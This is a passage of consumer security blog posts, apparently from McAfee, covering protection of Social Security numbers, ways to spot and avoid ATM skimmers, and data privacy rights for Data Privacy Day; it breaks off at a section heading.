    • Credit and financial information: When combined with other identity elements, such as your name and address, your SSN can help criminals access your credit reports and financial accounts. Fortunately, legitimate financial institutions require multiple forms of verification beyond your SSN, including security questions, account numbers, and authentication codes sent to your registered devices.
    • Government benefits access: Your SSN serves as a key identifier for Social Security benefits, Medicare, unemployment claims, and tax refunds. Criminals may attempt to file fraudulent claims using your SSN, but the Social Security Administration has implemented stronger identity verification requiring additional documentation and in-person visits for many services.
    • Employment records: While your SSN identity theft risk includes employment fraud, most employers now use E-Verify and require physical documentation such as driver’s licenses and passports. Your SSN alone typically isn’t enough for someone to successfully impersonate you for employment, though it can be part of a broader identity theft scheme.
    • Medical records and insurance: Healthcare providers use SSNs to verify insurance coverage and access medical histories. Criminals have attempted medical identity theft, but most healthcare systems now require photo ID, insurance cards, and often biometric verification to access sensitive medical information and services.

    Your stolen SSN could be on the dark web

    Your Social Security number is one of your most private identifiers, but in today’s data economy, it can quietly slip into criminal marketplaces on the dark web. Even if you’re careful with your information, you can’t control how organizations protect the data they collect from you. These exposures often result from data breaches, scams, or systems you had to trust — employers, hospitals, banks, schools, and even government agencies. When your SSN shows up there, it’s usually bundled with your other information—name, birthdate, address—making it far more valuable and dangerous than a random number on its own.

    Being familiar with the common paths that take your SSN to the dark web will help you recognize and avoid the risks earlier, and act fast if your information is ever compromised.

    • Third-party data breaches: Your SSN could end up on the dark web when companies, healthcare providers, or government agencies you’ve shared it with experience security breaches. Recent high-profile incidents have exposed millions of records, including major credit reporting agencies and healthcare systems.
    • Device malware and info-stealing attacks: Cybercriminals use sophisticated malware that can capture data as you type, including Social Security numbers entered on tax forms, job applications, or financial websites. Banking trojans and keyloggers specifically target sensitive information for sale on illicit markets.
    • Phishing schemes and social engineering: Scammers impersonate trusted organizations like the IRS, your bank, or employers and create convincing fake websites, emails, or phone calls that trick you into “verifying” your SSN. They will claim your SSN has been “suspended” or “compromised,” threaten you with arrest or legal action, or request to verify your SSN for any reason. Pressure tactics and demands for immediate action are classic red flags.
    • Compromised data brokers: Data brokers legally collect and sell personal information, gathered from public records, social media, and other sources, creating comprehensive profiles that become valuable targets for cybercriminals. When their systems are breached, your SSN and other details can be exposed.
    • Social engineering of service providers: Criminals sometimes target employees at companies that handle your information, manipulating them to gain unauthorized access to customer records. Call center representatives, healthcare workers, or government employees may be tricked into providing access to systems containing SSNs.
    • Account takeovers: Account takeovers occur when criminals gain access to your existing accounts through stolen passwords, security question answers, or two-factor authentication bypasses. Once inside accounts at financial institutions, healthcare providers, or government services, they can view stored SSNs or use account access to request more information.
    • Mailbox theft: Physical mail theft remains a surprisingly effective way for criminals to guess or find documents containing your SSN. Tax documents, insurance statements, pre-approved credit offers, and government correspondence often contain complete or partial Social Security numbers that help criminals piece together your identity.
    • Public records: Public records databases, court filings, property records, and voter registration information sometimes contain complete or partial SSNs. While efforts have been made to remove SSNs from public records, older documents and some current filings may still expose this information.

    The doors that open with your Social Security Number

    Once criminals have your SSN, they can do a range of fraudulent activities that can compromise your relationships, health, career, financial standing, and even your freedom. A single SSN can fuel everything from credit and loan scams to tax fraud, medical identity theft, and even long-term schemes like synthetic identities. Here are some examples:

    • New account fraud: Criminals could use your SSN and other personal information to open credit cards, loans, or bank accounts in your name. This can destroy your credit score and leave you responsible for fraudulent debt that can take years to resolve.
    • Tax refund fraud: Scammers file fake tax returns using your SSN to claim your refund before you file your legitimate return. This leaves you dealing with IRS complications and delays in receiving your actual refund, often extending into the following tax year.
    • Medical identity theft: When someone uses your SSN to receive medical care, prescription drugs, or submit insurance claims, it can contaminate your medical records with incorrect information and exhaust your insurance benefits. This puts your health at risk and can result in thousands in fraudulent medical bills.
    • Government benefits fraud: Criminals apply for unemployment benefits, Social Security benefits, or other government assistance using your SSN. This complicates your own eligibility and creates tax complications when benefits are reported under your name.
    • Employment fraud: Someone may use your SSN for employment, which means their income gets reported to the IRS under your name, potentially affecting your tax liability and Social Security benefits calculation. You might receive unexpected tax documents or face complications with the IRS over unreported income you never earned.
    • SIM swap setup: Your SSN serves as a verification tool when criminals attempt to transfer your phone number to their device, giving them access to two-factor authentication codes and potentially your financial accounts. This can lead to rapid-fire account takeovers across multiple platforms.
    • Synthetic identity creation: Fraudsters combine your real SSN with fake names and addresses to create entirely new identities for long-term fraud schemes. These synthetic identities can build credit over time, making the fraud harder to detect and potentially more damaging when discovered.

    Verify and block anyone using your Social Security Number

    Social Security identity theft isn’t always obvious right away. In many cases, people don’t realize their SSN has been compromised until weeks or months later. If you want to know if your SSN has been misused, there are clear warning signs and reliable ways to check. By reviewing a few key records, you can spot red flags early and shut down fraud before it snowballs into a long, expensive recovery process.

    1. Check your credit reports: Request your free annual credit reports from federally authorized sources. Look for accounts you didn’t open, credit inquiries you didn’t authorize, or addresses you’ve never lived at. You’re entitled to one free report from Experian, Equifax, or TransUnion every 12 months, so stagger them quarterly for ongoing monitoring.
    2. Set up fraud alerts and credit monitoring: Place a fraud alert with any of the three credit bureaus to require creditors to verify your identity before opening new accounts. Consider setting up account alerts with your bank and credit card companies as well to notify you of unusual activity. These notifications can catch SSN identity theft early before damage occurs.
    3. Review your Social Security Administration account: Create or log into your Social Security account to check your earnings history and benefit statements. Look for employment or earnings you don’t recognize, as criminals often use stolen SSNs for work authorization. Any discrepancies could indicate someone is using your SSN for employment fraud.
    4. Examine IRS documents and consider an IP PIN: Check your annual Social Security Statement for accuracy and review any IRS letters about duplicate tax filings or suspicious activity. If you suspect SSN details leaked, request an Identity Protection PIN (IP PIN) from the IRS or tax transcripts through the IRS Get Transcript portal.
    5. Monitor medical statements and insurance claims: Review your health insurance statements, Medicare summaries, and medical bills for services you didn’t receive or providers you’ve never visited. Medical identity theft using your SSN can result in incorrect information in your medical records and unexpected bills. Contact your insurance company immediately if you spot unfamiliar claims or treatments.
    6. Check for unemployment and government benefits fraud: Contact your state’s unemployment office to verify that no claims were filed in your name. Review any government benefit accounts you have as well for suspicious activity.
    7. Conduct a comprehensive identity audit: Search your name combined with personal details online to see if your information appears on data broker sites. Set up ongoing dark web monitoring through reputable services to alert you if your SSN appears in future breaches.

    Your first steps to stop the fraudulent activity

    If you discover that someone has been using your SSN, take these steps immediately:

    1. Freeze your credit: Contact all three major credit bureaus to place a free credit freeze on your accounts. This prevents anyone from opening new credit accounts in your name. Keep your PIN numbers safe as you’ll need them to lift the freeze when applying for credit temporarily.
    2. File an identity theft report: Report the SSN theft to the Federal Trade Commission. The FTC’s step-by-step, personalized guidance will help you navigate the recovery process and provide documentation for creditors and other institutions.
    3. Contact affected financial institutions: Notify your bank, credit card companies, and other financial institutions where you have accounts. Request new account numbers, cards, and fraud alerts to monitor for suspicious activity.
    4. Secure your Social Security Administration account: Create or secure your my Social Security account to prevent fraudsters from creating one in your name. Enable two-factor authentication and review your earnings record for any unauthorized employment. If someone is already using your SSN for work, contact the SSA immediately to report the misuse.
    5. Document everything: Keep detailed records of all communications, including dates, names of representatives, reference numbers, and actions taken. Create a file with copies of all reports, correspondence, and documentation. This paper trail will be invaluable if you need to dispute fraudulent accounts or prove your case to creditors and law enforcement.
    6. Stay vigilant and follow up: Monitor your credit reports, bank statements, and government benefits regularly for at least the next 12 months. The effects of SSN theft can surface months later, so ongoing monitoring is crucial for your long-term financial security.

    Long-term, preventive measures to limit your exposure

    Since your SSN can’t be easily changed and is still treated like a universal ID, the safest approach is to put up barriers that make it harder for criminals to use, even if they get it. Aside from the steps listed above, here are additional measures you can follow to protect your SSN from the start:

    • Minimize sharing your SSN: Only provide your SSN when absolutely required by law or for essential services such as banking, employment, or medical care.
    • Ask for alternatives: Many organizations request your Social Security number out of habit. Ask if you can use an alternative identifier, such as a driver’s license number.
    • Be cautious with Social Security number requests over the phone or email: Legitimate organizations rarely ask for your full SSN via phone or email. When in doubt, hang up and call the organization directly using a number from their official website to verify the request.
    • Use strong, unique passwords: Since details leaked in data breaches can help criminals predict Social Security numbers and crack passwords, it is best to protect all your accounts with complex, unique credentials using a password manager.
    • Enable two-factor authentication: Add an extra layer of security to your Social Security Administration, IRS, banking, and credit accounts by setting up two-factor or multi-factor authentication, which blocks 99% of automated attacks.
    • Keep your devices and software updated: Install security updates promptly on all devices. Malware often targets personal information, including Social Security numbers, so staying current with patches protects your data from the latest threats.
    • Shred physical documents: Physical theft remains a common way criminals obtain Social Security numbers. So before throwing away tax returns, medical records, or financial statements, put them through a cross-cut shredder.
    • Monitor your credit reports and account statements: Check for unauthorized accounts or inquiries that could indicate SSN misuse. Request free credit reports and review bank and credit card statements monthly.
    • Consider additional protections: Consider enrolling in credit monitoring services and identity theft protection. These services can alert you to other types of SSN identity theft, such as employment fraud or medical identity theft.

    FAQs about Social Security Numbers

    When can organizations legally request my SSN?

    Federal law requires SSN disclosure in specific situations. Organizations can legally require your SSN when no reasonable alternative exists and when they have a specific legal requirement or legitimate business need, such as:

    • Tax reporting is involved: Employers, financial institutions, and others who must file tax documents with the IRS
    • Credit checks are necessary: Lenders, landlords, and others performing background or credit verification
    • Government benefits: Social Security, Medicare, unemployment, and other federal or state programs
    • For legal compliance: Situations where federal or state law specifically mandates SSN collection

    What notices are organizations required to present when requesting my Social Security number?

    When an organization requests your SSN, they must provide what’s called a disclosure statement, as clarified under the updated Privacy Act of the Department of Justice’s Office of Privacy and Civil Liberties. Legitimate organizations requesting your SSN must tell you:

    • Whether providing your SSN is mandatory or voluntary
    • What legal authority permits them to request it
    • How they plan to use your SSN
    • What happens if you refuse to provide it

    If an organization can’t provide clear answers to these questions, that’s a red flag. The FTC’s consumer guidance emphasizes that you have the right to understand why your SSN is needed before you provide it.

    When can I decline to provide my SSN?

    You can typically decline when it’s not a necessity, alternative identification exists, it seems excessive, and there is no clear legal requirement. Common situations where you can often say no include gym memberships, retail purchases, job applications that don’t require credit checks, and various service sign-ups.

    What are safer alternatives to SSN disclosure?

    When you need to verify your identity but want to minimize SSN exposure, several alternatives can work depending on the situation:

    • Individual Taxpayer Identification Numbers
    • Driver’s license numbers
    • Partial SSN disclosure
    • Alternative methods such as bank statements, utility bills, or other documents

    Final thoughts

    While it’s concerning that Social Security numbers can be predicted or leaked through data breaches, you’re not powerless against SSN identity theft. The practical steps we’ve outlined put you firmly in control of your personal information security—from placing credit freezes and setting up IRS IP PINs to securing your Social Security Administration account with strong authentication. Take action today by implementing these protective measures to reduce your risk significantly.

    For added security, consider a McAfee Identity Protection plan to experience proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your financial accounts.

    The post Smart Ways to Keep Your Social Security Number from Being Cracked appeared first on McAfee Blog.

    Essential Tips to Avoid ATM Skimming

    By: McAfee

    With the rise in digital banking and online transactions, the number of automated teller machines (ATMs) worldwide declined to 2.95 million in 2025, according to the finance and crypto resource site CoinLaw. Despite this decline, ATM fraud continues to victimize innocent consumers, with global losses estimated at $2.4 billion in 2025.

    Among the ATM-related security issues, card skimming accounted for almost 60% of all reported global ATM fraud cases in 2025, according to CoinLaw. Other ATM-related security threats include malware (21%) and cryptocurrency ATM scams. AI-driven ATM fraud, although still in its infancy (0.11% in 2025), is gaining traction as cybercriminals develop new phishing techniques.

    In this guide, we will explore some of the security threats associated with ATMs, with a focus on skimming, and provide tips on protecting your data and money in your bank account.

    What is ATM skimming?

    ATM skimming is a form of payment card fraud where criminals secretly install illegal devices on card readers, fuel pumps, or point-of-sale terminals, which then steal your debit or credit card information. These devices, called skimmers, capture the magnetic stripe data from your card while hidden cameras or fake PIN pads record your personal identification number. With both pieces of information, criminals can create counterfeit cards or make unauthorized online purchases using your account.

    Skimming devices have become increasingly sophisticated and harder to detect. Traditional overlay skimmers sit on top of legitimate card readers, but newer “shimmer” devices are inserted more deeply into the card slot, making them virtually invisible to casual inspection. These devices can store data from hundreds of cards before criminals retrieve them, often using Bluetooth technology to wirelessly download stolen information without physically accessing the skimmer.

    ATMs remain the most common target for skimming attacks, but criminals also target gas station fuel pumps, which often have weaker security systems and less frequent maintenance checks. Point-of-sale terminals at retail locations, restaurants, and other businesses also present opportunities for skimming, particularly when employees are involved in the scheme.

    The threat persists for several interconnected reasons. Payment card fraud is quite a profitable business and can be scaled across states or countries. Technology gaps also contribute to the problem, as many ATMs and payment terminals continue to use legacy magnetic stripe technology despite the introduction of more secure EMV chips in newer cards. Criminals also exploit legacy systems, especially if the ATM does not receive regular security updates.

    Additionally, decommissioned ATMs can be freely gathered from junkyards or casually bought from online marketplaces, giving criminals the chance to collect personal data stored in the computer and study the discarded machine’s security features to improve their skimming techniques.

    In some cases, used ATMs are purchased on eBay or Craigslist and then installed in areas with ample foot traffic. These machines, which can be powered by car batteries or simply plugged into a nearby outlet, are programmed to read and copy credit card data.

    Consequences of skimming

    When your card information is compromised through skimming, the financial and personal consequences can be significant. Criminals may drain your account through ATM withdrawals or fraudulent purchases, potentially leaving you unable to access your own money. Since debit card transactions often clear immediately, unauthorized withdrawals can cause overdraft fees and bounced check charges before you even realize your account has been compromised.

    Beyond the financial losses, ATM skimming can lead to identity theft, where the personal information captured becomes part of larger criminal databases used in other fraud schemes.

    Consequently, your credit score and banking relationships may also suffer if fraudulent accounts are opened in your name or if you’re unable to resolve unauthorized charges quickly. While the law gives you limited liability for fraudulent transactions, the process of restoring your accounts can be time-consuming and stressful.

    Types of ATM skimming devices and how to spot them

    Criminals use a range of devices—some obvious, others nearly invisible—to steal card data and PINs right at the machine. Knowing the main types of skimmers, what they look like, and where they’re usually placed can help you recognize them and avoid a compromised ATM.

    Overlay card readers

    The most common type of skimming device, overlay card readers are fake attachments that criminals place directly over the legitimate card slot of an ATM. As you insert your card, it passes through the skimmer first, which captures the magnetic stripe data from your card before it reaches the actual card reader.

    Deep-insert or shimmer devices

    An evolution of skimming technology, shimmer devices are extremely thin circuit boards that criminals insert deep into the card slot, making them nearly impossible to detect through visual inspection alone. When you insert your card, you might notice increased resistance, unusual vibrations, or your card feeling momentarily stuck.

    Pinhole cameras

    Criminals use tiny cameras to capture your PIN as you enter it on the keypad. They are so small they can be hidden in seemingly innocent locations around the ATM. Look for a small camera attached to the top of the screen, hidden in a brochure holder, or even concealed in a fake security sign.

    Fake PIN pads

    These devices are placed over the legitimate ATM keypad to capture your PIN as you enter it. The keypad may feel spongier than usual, have a different texture, or seem thicker than normal. You might notice the numbers are printed differently, the buttons don’t press down as far as expected, or there’s a slight color difference between the keypad and the rest of the ATM. If the keypad feels loose, raised, or different from other ATMs you’ve used, don’t enter your PIN.

    Bluetooth-enabled skimmers

    Considered an advanced skimming technique, wireless Bluetooth-enabled skimmers can wirelessly transmit your stolen card and PIN data to criminals, eliminating the need for them to return to retrieve the device. You could detect them by checking your phone’s Bluetooth settings for unusual device names appearing in the area, though many criminals use generic names to avoid detection. If you notice people loitering near ATMs with mobile devices, especially if they seem to be monitoring ATM users, this could indicate that a Bluetooth skimming operation is in progress.

    Combination attacks

    Criminals often combine multiple types of skimming devices to maximize their data capture. A typical combination attack might involve an overlay card reader paired with a pinhole camera, or a shimmer device combined with a fake PIN pad. This is why security experts recommend following all protective measures when you use an ATM.

    Emerging technologies

    Recent advances in skimming technologies include devices that can be inserted through existing openings in ATMs without requiring external attachments, as well as skimmers that use near-field communication (NFC) technology to capture contactless payment information.

    Protective steps to take before inserting your ATM card

    Choose bank-operated ATMs in well-lit areas

    Your safest bet is to use ATMs inside bank branches or those clearly operated by major financial institutions. These locations have better security measures, such as surveillance cameras and regular checks that detect tampering. At outdoor ATMs, select machines in well-lit, high-traffic areas where criminal activity is less likely to occur unnoticed. Avoid ATMs in dimly lit, isolated locations where skimmers can be easily installed.

    Examine the card slot

    Before inserting your card, closely inspect the card insertion slot. Legitimate ATM card readers should have a uniform appearance with smooth edges and consistent coloring. Look for unusual attachments or devices that seem to have been added on top of the original reader. The card slot should align perfectly with the surrounding ATM fascia. Any gaps, misalignments, or signs that something has been glued or attached should raise immediate red flags. Trust your gut.

    Perform the wiggle test

    One of the most effective ways to detect fake card readers on ATMs is through tactile inspection. Gently grasp the card reader and try to wiggle it. A legitimate card reader should feel solid and permanently attached. If the reader or the housing feels loose, this is a strong indicator of a skimmer. If anything moves when it shouldn’t, do not use that ATM and report it to the bank immediately.

    Inspect the keypad

    Examine the keypad carefully for any signs of modification or overlay devices. Overlay keypads often appear slightly thicker or misaligned with the surrounding area. When pressing the buttons, each one should have consistent resistance and feel. Any button that sticks or seems higher than others could indicate tampering. Pay attention to the area around the keypad for adhesive residue or scratches. Legitimate ATM keypads have consistent button spacing, uniform coloring, and should feel solid when pressed.

    Check the ATM’s fascia and bezel

    The ATM’s outer casing and bezel should have a uniform appearance with no obvious modifications such as loose panels, extra pieces of plastic, or areas with different coloring or texture from the rest of the machine. Check for any unusual wiring, small cameras, or devices that appear out of place. The area around the screen should be examined for any tiny cameras or recording devices that capture PIN entry. All text, logos, and branding should appear professional and consistent with the bank’s standard ATM design.

    Survey the surrounding area

    Before using any ATM, check the area for any unusual objects that could house cameras or recording equipment, including fake brochure holders, unusual signage, or any items that seem out of place. Check for people loitering nearby who seem to be watching ATM users or vehicles parked unusually close to outdoor ATMs with passengers or drivers who appear to be monitoring ATM activity.

    Scan for Bluetooth devices

    Before using an ATM, check your smartphone’s Bluetooth settings to scan for nearby devices with suspicious names, such as those with generic or random characters, or names that don’t correspond to legitimate businesses in the area. An unusual concentration of unknown devices near an ATM could be a warning sign. This technique works best in areas where there are typically few Bluetooth devices, such as standalone ATMs.

    ATM safety tips

    Enable and use contactless withdrawal

    Enable contactless withdrawals through your bank’s mobile app to authenticate and authorize QR code-based transactions and reduce your need to use an ATM. This technology uses tap-to-pay functionality or near-field communication (NFC) features, providing the same convenient access to your funds. Contact your bank to learn about contactless ATM options and how to activate these features on your accounts.

    Verify ATM authenticity through official channels

    Bank websites or mobile apps usually show the locations of their legitimate ATMs. If you’re unsure about an ATM’s authenticity, check these official resources to confirm the machine is listed as a legitimate location. This step can help you avoid both skimming devices and other fraudulent ATM operations entirely. Be particularly cautious of ATMs in unusual areas. When traveling, stick to ATMs inside recognizable financial institutions.

    Shield your PIN entry

    Even when ATMs appear legitimate, always protect your PIN entry from potential observation. Use your free hand, body, or a purse to cover the keypad while entering your PIN to guard against both hidden cameras and shoulder-surfing by nearby criminals. Consider changing your PIN regularly and never write it down. If you suspect your PIN may have been compromised, change it immediately through secure channels.

    Monitor your account activity vigilantly

    Implement robust account monitoring to detect and address any skimming-related fraud as quickly as possible. Set up real-time account alerts through your bank’s mobile app to receive immediate notifications of all transactions. Review your account statements regularly and report any unauthorized activity immediately. Consider setting daily withdrawal limits to match your usage patterns to minimize losses if your card information is compromised.

    Report suspicious ATMs immediately

    If you notice signs of tampering or suspicious activity at an ATM, report it immediately to the bank to protect other customers from becoming victims and to help law enforcement track down the perpetrators. Contact the bank’s customer service line using the phone number on the back of your card, rather than the numbers displayed on the potentially compromised ATM. Document the ATM’s location, including the address and any identifying numbers or codes visible on the machine.

    Stay informed about ATM fraud trends

    Stay informed about the latest ATM skimming techniques and prevention strategies through reputable sources. Consumer alerts provide updated guidance on protecting yourself from these crimes, as do major credit card networks such as Visa and Mastercard. Following your bank’s security updates and fraud alerts helps you stay aware of new threats in your area and emerging criminal techniques to watch for during ATM transactions.

    Avoid assistance from strangers

    Be highly cautious of anyone offering to help you with ATM troubles, even if they appear well-intentioned, especially if they suggest using their phone to call the bank or offer to show you how to complete your transaction. If you encounter problems with an ATM, cancel your transaction, retrieve your card, and contact your bank directly.

    Use ATMs during daylight or banking business hours

    Criminals usually install skimming devices when fewer people are around to witness their actions. Daytime transactions in high-traffic areas increase the likelihood of suspicious behavior being noticed and reported. If you must use an ATM at night, choose one in a well-lit area with good visibility, preferably near businesses that are still open and have staff and customers present. Consider using indoor ATMs exclusively.

    Keep your ATM receipts secure

    Always take your ATM receipts and store them securely until you have verified the transaction on your statement. Don’t leave them at the machine or throw them away in nearby trash cans where criminals might retrieve them to gather information about your account; even partial account numbers and transaction details could be useful to identity thieves. You can shred the receipts once you’ve confirmed the transactions.

    Understand your rights and protections

    Familiarize yourself with your bank’s policies regarding ATM fraud and your rights under federal law. The Electronic Fund Transfer Act provides specific protections for consumers who experience unauthorized ATM transactions. These protections offer you up to 60 days to report unauthorized transactions to limit your liability, but reporting within two business days provides the strongest protection.

    Plan your cash needs in advance

    Reduce your ATM usage by planning your cash needs and making larger, less frequent withdrawals to reduce your overall exposure to potential skimming attempts. Consider getting cash back during purchases at grocery stores, pharmacies, and trusted retailers, rather than using unfamiliar ATMs, especially when traveling or in unfamiliar areas.

    Be extra vigilant during the holiday season

    ATM skimming attempts surge during peak shopping and travel periods when foot traffic increases at malls, airports, hotel lobbies, and other commercial or tourist locations. Increased cash withdrawals, crowded shopping areas, and travelers using unfamiliar ATMs create ideal conditions for skimming operations. In addition, criminals know that holiday shoppers are often distracted, rushed, and less vigilant about using ATMs. That’s why it’s important for you to be extra cautious. If you must use an ATM, take a breath and slow down to thoroughly inspect the machine and your surroundings before inserting your card.

    Immediate steps to take if your card was skimmed

    The guidance below walks you through exactly what to do in the moment and right after, so you can limit risk to yourself and prevent others from becoming victims, too.

    1. Contact your bank immediately. Call the number on the back of your card or use your bank’s mobile app to report unauthorized transactions. Most banks have 24/7 fraud hotlines that can freeze your account within minutes to prevent further unauthorized use.
    2. Dispute unauthorized charges promptly. Your liability protections depend on how quickly you report fraud. For credit cards, federal law limits your liability to $50 for unauthorized charges. For debit cards, report any unauthorized transactions within two business days to limit liability to $50, or within 60 days to cap liability at $500. After 60 days, you could be responsible for all unauthorized transactions.
    3. Request a replacement card. Your bank will cancel your compromised card and issue a new one with different numbers. Most banks can expedite delivery within 1-2 business days, though some may charge a fee for rush delivery. Ask about temporary digital cards for immediate online use while waiting for your physical card.
    4. Inform your ID Theft protection provider. If you have an identity theft protection subscription, inform your service to activate proactive identity surveillance, monitor your credit and personal information, and seek support from fraud resolution agents who can work through the process of resolving the identity theft issues.
    5. Place a fraud alert on your credit reports. Contact one of the three major credit bureaus—Experian, Equifax, or TransUnion—to place a free fraud alert. This alert requires creditors to verify your identity before opening new accounts and automatically applies to all three bureaus for one year.
    6. Consider a credit freeze for enhanced protection. A credit freeze prevents new creditors from accessing your credit report and identity thieves from opening accounts in your name. You can freeze and unfreeze your credit for free with all three bureaus online, by phone, or by mail.
    7. Monitor your accounts closely. Review all bank and credit card statements for the next few months. Set up account alerts for transactions over a certain amount, and consider using your bank’s mobile app to check account activity daily during this period.
    8. File additional reports if identity theft occurs. If criminals used your card information for identity theft beyond just card fraud, file a report with the Federal Trade Commission and consider filing a police report. The FTC provides a personalized recovery plan and pre-filled forms for creditors.
    9. Update automatic payments. Replace your old card information with your new card details for any automatic payments, subscriptions, or saved payment methods with online retailers to avoid service interruptions.
    10. Keep detailed records. Document all communications with your bank, including dates, times, representative names, and reference numbers. Save copies of dispute forms and any correspondence related to the fraud investigation.

    Final thoughts

    Protecting yourself from ATM skimming requires ongoing attention, but you’re now equipped with the knowledge to use ATMs confidently and securely—perform a visual inspection, do the wiggle test, review the keypad, and be aware of your surroundings. Trust your instincts. If something feels wrong or looks suspicious about an ATM, consider finding an alternative location. Your intuition is a valuable tool in recognizing potentially compromised machines.

    Share these ATM safety practices with your family members and friends to strengthen their security as well. Take a moment to revisit your bank’s fraud protection guidelines and ensure you understand their notification procedures for suspicious activity. Your financial institution can partner with you in preventing fraud, so don’t hesitate to reach out with questions about their latest security features.

    The post Essential Tips to Avoid ATM Skimming appeared first on McAfee Blog.

    Celebrate Data Privacy Day by Applying These Best Practices

    By: McAfee

    This is a critical time for our personal security, particularly in terms of privacy and personal information. A battle is being waged over our data by multiple parties, from criminal hackers to advertisers and data brokers. This article provides essential tips to help you protect the personal details you want to keep private and stay safe online.

    The Battle for Your Personal Data

    Criminal hackers and identity thieves want to use your name to open new accounts, which they can turn into cash. They may try to obtain credit cards, utility services, or mobile phones using your good credit. In other cases, these same thieves take over existing bank or credit card accounts and completely empty them out. Identity theft affects millions of Americans each year, with over 1.4 million reports filed to the FTC in recent years and an estimated 15 million victims annually.

    Online Tracking and Advertising

    Online, advertisers and marketers use tracking cookies and sophisticated technologies to gather information about you and your web browsing habits. They can then offer you products or services based on the profile they’ve developed. Almost every major website contains cookies, and they are changing the way advertising is created and targeted.

    The Federal Trade Commission (FTC) has explored options, such as “Do Not Track” mechanisms, to allow consumers to opt out of data collection; however, these efforts have faced significant challenges. Browser-based solutions have been proposed, but the advertising industry’s partnerships with major media and tech companies have made comprehensive opt-out mechanisms difficult to implement effectively.

    Social Media Privacy Risks

    Social media companies compete for your attention and your information because user data is valuable to advertisers and marketers. Whatever you post in your profile is broken down, cataloged, and disseminated. Your name, age, address, email, phone number, contacts, income status, job description, and other personal details are of use to anyone targeting your wallet.

    However, legitimate advertisers aren’t the only ones targeting social networks. Criminal hackers and identity thieves are accessing your data, either through the public portion of these sites or by hacking through the back door. The bad guy is using your profile information to come up with an answer to your password reset question, or to trick you into opening your wallet or entering login credentials that might allow them to take over your existing accounts.

    What is Data Privacy Day?

    Amid all these developments, the National Cyber Security Alliance established Data Privacy Day, an annual awareness event observed every January 28, which encourages you to take control of your personal information and understand your online privacy rights. Initially launched in 2008, this important day coincides with the anniversary of the signing of Convention 108, the first legally binding international treaty dealing with privacy and data protection.

    As a U.S. consumer, Data Privacy Day matters to you more than ever because your personal information has become incredibly valuable and, unfortunately, increasingly vulnerable. Every day, you share personal details through social media, shopping websites, mobile apps, and online services, often without realizing how this information is collected, used, or shared.

    The observance of this day highlights several key risks that affect your daily digital life. Data misuse occurs when companies collect more information than necessary or use your personal details in ways you haven’t explicitly approved. Identity theft remains a significant threat, with criminals using stolen personal information to open fraudulent accounts, make unauthorized purchases, or even file fake tax returns. Additionally, data breaches continue to expose millions of Americans’ personal information each year, from social security numbers to financial details.

    What makes Data Privacy Day empowering is its focus on actionable steps you can take immediately. Rather than feeling overwhelmed by privacy concerns, you can use this day as motivation to review and strengthen your digital privacy habits. The day is a reminder that privacy and data protection aren’t just technical concepts. They’re fundamental rights that help you maintain control over your digital life.

    Data privacy core concepts

    Before delving deeper into regulations and best practices, let’s take a look at the core concepts. The Federal Trade Commission defines data privacy as the reasonable expectation that your personal information will be handled appropriately by the organizations that collect it. It is your fundamental right to control how your personal information is collected, used, shared, and retained by the companies and services you interact with every day. At its heart, data privacy ensures that you have a say in what happens to details about your life, from your name and email address to your online shopping preferences, videos watched, social media usage, and down to your browsing habits and location data.

    Your data follows a path that starts with collection, when companies gather information directly from you, such as when you fill out a form, or indirectly through cookies and tracking pixels. The use phase refers to how organizations process your information, whether to improve their services, target advertisements, or analyze user behavior. Sharing involves passing your data to third parties, from business partners to data brokers. Retention determines how long your information stays in their systems, often well beyond the end of your active relationship with the service.

    Throughout this process, your information is governed by three principles of modern data privacy:

    • Consent means companies should ask for your permission before collecting and using your personal information, and this permission should be freely given, specific, and informed. You shouldn’t have to accept data collection just to use basic services.
    • Control gives you the power to access, correct, delete, or restrict the use of your personal data.
    • Transparency requires companies to clearly explain their data practices in plain language, rather than burying them in lengthy legal documents.

    When Netflix asks if you want to share viewing data to improve recommendations, that’s consent in action. When Google lets you download your search history or delete location tracking, you’re exercising control. When Apple’s privacy labels show exactly what data an app collects, that’s transparency working for you.

    Your data privacy rights

    Under these newly instituted state privacy laws, you have several key rights that put you in control of your personal information:

    • Right to know: You can request information about what personal data companies collect about you, how it’s used, and who it is shared with.
    • Right to access: You can obtain copies of the personal information companies have collected about you.
    • Right to delete: You can request companies to delete your personal information, with certain exceptions.
    • Right to opt out: You can opt out of the sale or sharing of your personal data for targeted advertising.
    • Right to correct: You can request corrections to inaccurate personal information.
    • Right to non-discrimination: Companies cannot penalize you for exercising your privacy rights.

    Data privacy and data protection

    Data protection and data privacy are sometimes used interchangeably, but they serve different but complementary roles in keeping your personal information safe:

    • Data privacy is about your rights and choices in how your personal information gets collected, used, and shared. It’s less about technical security and more about giving you control over what happens with your data.
    • Data protection is about securing your information from threats such as hackers, breaches, and technical failures. It is the digital equivalent of a bank vault, using technical and organizational safeguards to keep your data safe from unauthorized access, theft, or loss.

    Here are some everyday scenarios that show how these concepts work differently:

    • Your encrypted backup files represent data protection in action. Even if someone gains access to your backup drive without the proper key, encryption makes your photos, documents, and files unreadable. The technical safeguard protects your data from misuse.
    • Choosing who can see your location on social media is a privacy decision. When you decide what personal information to share and with whom, you are exercising control over your data.
    • Your password manager provides data protection by securely storing and encrypting your login credentials, making them nearly impossible for criminals to steal and use.
    • Declining to provide your phone number when signing up for a shopping account is a privacy choice. You’re limiting the amount of personal information that gets collected about you in the first place.

    Data privacy laws

    As a consumer, your data privacy rights translate into real, actionable benefits you can use today. However, the effectiveness of these protections often depends on enforcement and your own awareness of the tools available to you.

    The U.S. privacy landscape

    U.S. state privacy laws are increasingly giving you the right to know what personal information companies collect, the right to delete your data, and the right to opt out of having your information sold or shared.

    America’s privacy framework is built on sector-specific federal regulations combined with increasingly robust state legislation. This approach means your rights and protections can vary significantly depending on where you live and what type of data is being collected.

    At the federal level, key laws include the Health Insurance Portability and Accountability Act (HIPAA) for healthcare data, the Fair Credit Reporting Act (FCRA) for credit information, and the Children’s Online Privacy Protection Act (COPPA) for children under 13 years. While these provide important protections in specific areas, they leave significant gaps in comprehensive consumer data privacy protection.

    To fill these gaps, California established crucial precedents through the California Consumer Privacy Act (CCPA) and its successor, the California Privacy Rights Act (CPRA). Other states are also now enacting comprehensive privacy laws, including Virginia’s Consumer Data Protection Act, Colorado Privacy Act, Connecticut’s Data Privacy Act, and Utah’s Consumer Privacy Act. Each provides residents with fundamental rights over their personal data while requiring businesses to implement stronger protection measures.

    Extra care for highly sensitive personal data

